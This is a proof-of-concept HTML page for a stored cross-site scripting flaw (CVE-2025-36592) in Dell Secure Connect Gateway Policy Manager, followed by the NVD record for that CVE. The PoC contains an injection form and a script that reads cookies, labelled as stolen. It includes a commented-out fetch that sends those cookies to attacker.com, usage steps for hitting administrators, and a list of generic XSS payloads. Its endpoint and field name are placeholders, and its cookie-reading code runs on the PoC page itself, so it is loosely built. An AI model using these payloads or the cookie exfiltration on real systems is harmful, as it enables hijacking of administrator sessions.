CVE-2025-36592

<!-- CVE-2025-36592 PoC - Stored XSS in Dell SCG Policy Manager --> <!DOCTYPE html> <html> <head> <title>CVE-2025-36592 PoC</title> </head> <body> <h2>CVE-2025-36592 - Dell SCG Policy Manager Stored XSS PoC</h2> <p>This PoC demonstrates the stored XSS vulnerability in Dell SCG Policy Manager.</p> <form id="xssForm" action="https://target-host/SecureConnectGateway/api/endpoint" method="POST"> <input type="hidden" name="field_name" value='"><script>alert("XSS - CVE-2025-36592")</script><x y='> </form> <script> // Extract session cookies var stolenCookies = document.cookie; console.log("Stolen Cookies:", stolenCookies); // Send cookies to attacker server // fetch("https://attacker.com/log?c=" + encodeURIComponent(stolenCookies)); // Auto-submit form for demonstration // document.getElementById('xssForm').submit(); </script> <p><strong>Usage:</strong></p> <ol> <li>Replace target-host with the actual Dell SCG Policy Manager server</li> <li>Inject the XSS payload in input fields (e.g., policy names, descriptions)</li> <li>When admin views the page, the script will execute</li> </ol> <p><strong>Example XSS Payloads:</strong></p> <pre> &lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;img src=x onerror=alert('XSS')&gt; &lt;svg/onload=alert(document.domain)&gt; </pre> </body> </html>

{"cve": {"id": "CVE-2025-36592", "sourceIdentifier": "[email protected]", "published": "2025-10-30T16:15:35.430", "lastModified": "2025-11-10T16:30:02.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Secure Connect Gateway (SCG) Policy Manager, version(s) 5.20. 5.22, 5.24, 5.26, 5.28, contain(s) an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Script injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:policy_manager_for_secure_connect_gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.32.00.18", "matchCriteriaId": "B5C9CDFB-2B6C-4364-A5F7-24D905C0EAAA"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000385220/dsa-2025-391-security-update-for-dell-secure-connect-gateway-policy-manager-for-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}